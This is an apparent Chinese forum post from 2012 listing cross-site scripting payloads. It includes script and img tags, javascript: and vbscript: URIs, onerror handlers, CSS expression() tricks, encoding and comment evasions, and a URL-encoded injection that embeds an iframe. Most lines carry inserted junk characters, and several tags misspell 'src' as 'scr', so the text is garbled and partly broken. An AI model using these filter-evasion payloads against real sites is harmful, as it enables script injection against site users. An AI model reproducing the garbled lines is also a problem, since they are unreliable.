<script>alert("跨站")</script> (最常用)
+ O) m+ p& M* e& T. e# D<img scr=javascript:alert("跨站")></img>0 t) r( o8 O# l, i. Y
<img scr="javascript: alert(/跨站/)></img>8 ~9 M A: V. Y5 z3 m2 j" F
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格), S: u1 H( j' N C1 D- R" X! j
<img scr="#" onerror=alert(/跨站/)></img>
+ E. b2 C) z# g: s<img scr="#" style="xss:expression(alert(/xss/));"></img>8 L7 S F; a8 l+ F; V% B" f6 q
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
9 U9 h: N1 }2 V- M% R6 [<img src=vbscript:msgbox ("xss")></img>
r# [7 c3 u% A: I" o<style> input {left:expression (alert('xss'))}</style>) ?, W; W5 D5 j* ^
<div style={left:expression (alert('xss'))}></div>% Q. g7 }0 F; v6 F( L% R* o
<div style={left:exp/* */ression (alert('xss'))}></div>9 P7 }4 b% a0 S- ] w) g, X
<div style={left:\0065\0078ression (alert('xss'))}></div>4 j6 h T' k( [- s. s' k# C) F
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>5 k6 m2 I4 t3 k2 x! C- O- F: q
unicode <div style="{left:expRessioN (alert('xss'))}">* Z/ A' R( `* j! [+ M
0 E* x2 O; O$ U$ Q7 @) D"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["4 z2 Q9 o* Y! s) }. O/ `, O
|
发表于 2012-9-13 17:15:04
收藏
支持
反对